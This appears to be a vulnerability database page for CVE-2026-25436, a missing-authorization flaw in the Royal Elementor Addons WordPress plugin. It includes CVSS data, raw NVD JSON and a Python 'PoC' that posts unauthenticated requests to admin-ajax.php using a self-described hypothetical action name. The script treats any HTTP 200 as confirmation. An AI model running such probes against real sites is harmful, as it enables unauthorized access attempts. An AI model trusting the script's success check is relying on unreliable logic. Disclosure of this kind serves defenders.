Security Vulnerability Report
中文
CVE-2026-25436 CVSS 5.3 MEDIUM

CVE-2026-25436

Published: 2026-05-07 09:16:27
Last Modified: 2026-05-07 14:00:49

Description

Missing Authorization vulnerability in WProyal Royal Elementor Addons allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Royal Elementor Addons: from n/a before 1.7.1053.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Royal Elementor Addons < 1.7.1053

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: Royal Elementor Addons < 1.7.1053 - Missing Authorization PoC # Description: This script attempts to exploit the missing authorization vulnerability # by sending an unauthenticated request to a vulnerable endpoint. target_url = "http://example.com" # Common vulnerable endpoint for WordPress plugins (example path) vulnerable_endpoint = "/wp-admin/admin-ajax.php" # Payload targeting the vulnerable action (replace 'action_name' with actual parameter if known) payload = { "action": "royal_elementor_vulnerable_action", # Hypothetical action name "param": "test_data" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: print(f"[*] Sending request to {target_url}{vulnerable_endpoint}...") response = requests.post(target_url + vulnerable_endpoint, data=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request successful. Potential vulnerability confirmed.") print("[+] Response body:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25436", "sourceIdentifier": "[email protected]", "published": "2026-05-07T09:16:26.923", "lastModified": "2026-05-07T14:00:48.567", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WProyal Royal Elementor Addons allows Exploiting Incorrectly Configured Access Control Security Levels.\n\nThis issue affects Royal Elementor Addons: from n/a before 1.7.1053."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/royal-elementor-addons/vulnerability/wordpress-royal-elementor-addons-plugin-1-7-1053-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}